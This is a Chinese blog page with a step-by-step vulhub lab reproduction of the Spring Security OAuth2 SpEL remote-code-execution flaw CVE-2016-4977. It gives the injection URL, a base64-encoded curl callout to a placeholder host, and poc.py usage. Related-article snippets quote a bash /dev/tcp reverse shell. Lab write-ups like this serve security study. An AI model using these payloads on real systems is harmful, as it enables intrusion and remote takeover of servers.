【vulhub】Spring Security OAuth2 RCE(CVE-2016-4977)

最新推荐文章于 2023-12-04 16:22:18 发布
最新推荐文章于 2023-12-04 16:22:18 发布
阅读量881 收藏
点赞数
文章标签: spring java 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42884199/article/details/121723006
版权

一、启动靶机

docker-compose up -d

url:

http://192.168.150.143:8080/oauth/authorize

admin、admin
在这里插入图片描述
url:

http://192.168.150.143:8080/oauth/authorize?response_type=${223*223}&client_id=acme&scope=openid&redirect_uri=

在这里插入图片描述

二、生成payload

curl http://xx.xx.xx.xx/Hacker

对命令bs64编码

Y3VybCBodHRwOi8veHgueHgueHgueHgvSGFja2Vy

利用poc.py脚本生成exp

python ./poc.py

在这里插入图片描述

三、发送payload

在这里插入图片描述

四、检验

tail -f /var/log/apache2/access.log

在这里插入图片描述

Crazy_Yu8
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2016-4977) SpringSecurityOauth 远程命令执行
weixin_45253622的博客
12-10 1705
漏洞简介: Spring Security OAuth 是为 Spring 框架提供安全认证支持的一个模块,其维护者发布了这样一个升级公告,主要说明在用户使用Whitelabel views来处理错误时,攻击者在被授权的情况下可以通过构造恶意参数来远程执行命令。 Spring Security OAuth 支持使用标准 SpringSpring Security 编程模型和配置习惯用法与 OAuth (1a) 和 OAuth2 一起使用 Spring Security。在使用白标签视图进行错误处理时,
用Docker复现SpringBoot CVE-2016-4977
m0_69555575的博客
08-22 564
Docker复现SpringBoot CVE-2016-4977
cve-2016-4977(spring-security-oauth) RCE漏洞复现
m0_58596609的博客
04-21 5112
cve-2016-4977(spring-security-oauth) RCE漏洞复现
小白上路_spring-security-oauth2 RCE复现分析
u013224189的专栏
06-29 1064
小白上路_spring-security-oauth2 RCE复现分析 首先高兴的宣布,CVE-2018-1260这个漏洞复现成功,弹出了windows可爱的计算器 然后就狠狠的抽自己一巴掌,讲述一下自己怎么把它折腾出来的。 关于CVE-2018-1260 一个标准的由于spring将不可信数据当作SPEL表达式直接解析导致的RCE漏洞 影响范围 Spring Securit...
vulhubSpring boot Security OAuth RCE (CVE-2016-4977) 漏洞验证与getshell复现
qq_45300786的博客
07-30 2233
利用条件 0x01 影响版本 Spring Security OAuth 1.0.0到1.0.5 Spring Security OAuth 2.0.0到2.0.9 Spring Security OAuth 2.0到2.0.14 Spring Security OAuth 2.1到2.1.1 Spring Security OAuth 2.2到2.2.1 Spring Security OAuth 2.3到2.3.2 0x02 默认登录账号密码 admin\admin 访问路径/oauth/auth
vulhubspringCVE-2016-4977漏洞复现
yougexiaojiuguan的博客
11-29 535
学习过程中的记录,方便以后查看。
Spring Security OAuth2 远程命令执行漏洞(CVE-2016-4977
EC_Carrot的博客
08-02 712
漏洞简介 Pivotal Spring Security OAuth 2.0.0版本至2.0.9版本和1.0.0版本至1.0.5版本中存在安全漏洞。远程攻击者可通过为‘response_type’参数制作值利用该漏洞执行代码。 漏洞复现 我们来进行反弹shell的操作,首先将bash命令进行编码: bash -i >& /dev/tcp/your-ip/9999 0>&1 我这里使用的是vulhub的环境,环境内有一个poc.py,用python3运行该脚本后,会让你输入字符
RCE with spring-security-oauth2漏洞复现(CVE-2018-1260)
公众号shadow sock7
04-29 1107
参考:https://xz.aliyun.com/t/2330 初始化:先根据https://github.com/wanghongfei/spring-security-oauth2-example 将内容保存为init.sql文件,然后启动mysql:参考https://blog.csdn.net/caiqiiqi/article/details/89642032 然后载入sql脚本: mys...
CVE-2016-4977 RCE in Spring Security OAuth漏洞分析
c0c0cf的专栏
09-21 1966
新浪微博: http://weibo.com/u/2275304001/home?wvr=5 微信公众号 DebugPwn 漏洞描述: When processing authorization requests using the whitelabel views, the response_type parameter value was executed
Spring Security oAuth2
qq_33756294的博客
03-10 132
Spring Security oAuth2简介令牌的访问与刷新客户端授权模式创建案例工程创建案例工程项目创建统一的依赖管理模块创建 oAuth2 案例模块创建认证服务器创建认证服务器模块基于内存存储令牌基于 JDBC 存储令牌RBAC 基于角色的权限控制创建资源服务器对认证服务器的修改创建资源服务器模块![操作流程](https://img-blog.csdnimg.cn/20200310145...
CVE-2016-4977
09-01
- *1* [【vulhubSpring boot Security OAuth RCE (CVE-2016-4977) 漏洞验证与getshell复现](https://blog.csdn.net/qq_45300786/article/details/119249422)[target="_blank" data-report-click={"spm":"1018....
红队系列-网络安全知识锦囊(持续更新)
aming小老弟
11-09 835
AJP13是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。AJP协议:WEB服务器通过TCP连接和SERVLET容器连接。为了减少进程生成socket的花费,WEB服务器和SERVLET容器之间尝试保持持久性的TCP连接,对多个请求/回复循环重用一个连接。一旦连接分配给一个特定的请求,在请求处理循环结束之前不会在分配。换句话说,在连接上,请求不是多元的。这个是连接两端的编码变得容易,虽然这导致在一时刻会有很多连接。
CVE-2016-4977(Spring-Security-Oauth)RCE远程命令执行漏洞复现(超详细版!)
精品博客,你值得一看~
09-02 1197
它是为了解决企业应用开发的复杂性而创建的。Spring Security OAuth2处理认证请求的时候如果使用了whitelabel视图,response_type参数值会被当做Spring SpEL来执行,恶意攻击者通过构造response_type值可以触发远程代码执行漏洞。#按 " i "进行编辑 ,然后复制下面的脚本 , 再按 " Esc "键 ,再按冒号wq " :wq " 保存并退出.先cd到spring目录下的CVE-2016-4977里面,然后使用docker-compose启动环境.
spring security oauth rce (cve-2016-4977) 漏洞分析
whatday的专栏
07-02 1018
背景描述 Spring Security OAuth 2016年以前有出一个CVE,这里写一个记录学习的东西。 漏洞详细 Spring Security OAuth官网有CVE-2016-4977的介绍,但是讲的不怎么清楚,就只是说了一下漏洞原理,我们就只知道是因为执行一个SpEL表达式https://pivotal.io/de/security/cve-2016-4977而产生的。看看利用的poc,大概了解一下整个过程。 http://localhost:8080/oauth/authorize?resp
vulhub系列之thinkphp(2-rce、5.0.23-rce、5-rce、in-sqlinjection)
weixin_43071873的博客
11-24 1647
Thinkphp 2.x 任意代码执行 漏洞详情: ThinkPHP是一个免费开源用户数量非常多的一个PHP开发框架。ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由: KaTeX parse error: Undefined control sequence: \w at position 23: …reg_replace('@(\̲w̲+)'.depr.’([^’.KaTeX parse error: Undefined control sequence: \/ at po
SpringSecurityOauth RCE (CVE-2016-4977) 分析与复现
weixin_33862514的博客
02-14 752
目录 0x00 前言 0x01 调试分析 0x02 补丁分析 0x03 参考 影响版本: 2.0.0-2.0.9 1.0.0-1.0.5 0x00 前言 这个漏洞与之前那个SpringBoot的SpEL表达式注入漏洞点基本一样,而且漏洞爆出来的时间点也差不多,可是...
Spring漏洞(CVE-2016-4977)在IDEA中复现
wxzyyds的博客
11-03 1279
复现SpringCVE-2016-4977),并且在IDEA中实现动态调试
CVE-2016-4977 Spring远程代码执行漏洞复现 POC、EXP在文末
weixin_45715461的博客
08-10 1481
CVE-2016-4977 Spring远程代码执行漏洞复现 POC、EXP在文末
spring Security OAuth2 远程命令执行漏洞(CVE-2016-4977)复现-kali
最新发布
qq_41760817的博客
12-04 1272
spring Security OAuth2 远程命令执行漏洞(CVE-2016-4977)复现
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值